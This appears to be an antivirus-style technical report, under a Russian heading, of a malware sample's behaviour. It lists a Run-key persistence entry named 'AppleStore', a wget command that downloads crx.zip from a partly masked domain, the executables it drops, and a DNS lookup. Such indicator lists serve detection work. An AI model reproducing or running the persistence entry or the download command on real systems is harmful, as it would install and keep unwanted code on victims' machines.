Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'AppleStore' = '"%APPDATA%\install_browser.exe"'
- '%APPDATA%\wget.exe' -O "C:\Fei\62231\crx.zip" "http://ki###edya.org/crxx.zip"
- '%APPDATA%\install_browser.exe'
- %APPDATA%\unzip.exe
- C:\Fei\62231\crx.zip
- %APPDATA%\install_browser.exe
- %APPDATA%\wget.exe
- %APPDATA%\unzip.exe
- %APPDATA%\wget.exe
- %APPDATA%\install_browser.exe
- 'ki###edya.org':80
- ki###edya.org/crxx.zip
- DNS ASK ki###edya.org
- ClassName: 'Indicator' WindowName: '(null)'